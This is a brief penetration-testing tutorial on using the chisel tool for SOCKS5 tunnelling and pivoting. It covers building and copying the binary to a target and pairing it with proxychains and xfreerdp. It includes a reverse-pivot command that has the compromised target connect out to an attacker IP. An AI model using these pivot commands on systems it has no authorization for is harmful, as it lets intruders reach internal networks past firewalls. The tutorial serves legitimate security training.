Skip to main content

Chisel

To perform SOCKS5 Tunnelling, we can use a tool called chisel. Chisel is written in Go that uses HTTP to transport data that is being secured using SSH. It can create a client-server tunnel connection in a firewall restricted environment.

We can download chisel on Kali using apt install chisel or download it from GitHub to transfer it to remote hosts.

https://github.com/jpillora/chisel.git

If we are downloading it from GitHub, we will need Go installed and use the following commands.

cd chisel
go build

Once built, we can transfer the binary to our target hosts using different file transfer methods such as SCP.

scp chisel <username>@<Target IP>:~/

Once transferred, we can run the following command on the target.

./chisel server -v -p <port> --socks5

Command breakdown:

  • server - Specify to run in server mode.
  • -v - Enable verbose mode.
  • -p <port> - Specify the port to listen for connections.
  • --socks5 - Specify to use SOCKS5.

Once the server has started, we can connect to it on our attacking machine.

chisel client -v <Tarrget IP>:<port> socks

Command breakdown:

  • client - Specify to run in client mode.
  • -v - Enable verbose mode.
  • <Target IP>:<port> - Specify the chisel server IP address and port that it is listening on.
  • socks - Specify to use SOCKS.

Once connected, we can edit the /etc/proxychains.conf and add the following information.

socks5 127.0.0.1 <port>

We can pivot by using proxychains before the command that we want to run. An example will be using xfreerdp.

proxychains xfreerdp /v:<Internal host IP> /u:<username> /p:<password>

Reverse Pivot

We can also use the --reverse flag to enable the target to connect to the attacker if there is no direct path.

chisel server --reverse -v -p <port> --socks5

We can connect to the server using the following command on the target.

./chisel client -v <Attacker IP>:<port> R:socks

In the above command, the R stands for reverse. Reverse remotes will listenon the server's default socks port (1080) and terminate the connection at the client's internal SOCKS5 proxy.

Once done, we will need to add the following line to the /etc/proxychains.conf file.

socks5 127.0.0.1 1080

Once added, we can pivot by adding the proxychains command before running our desired command or tool.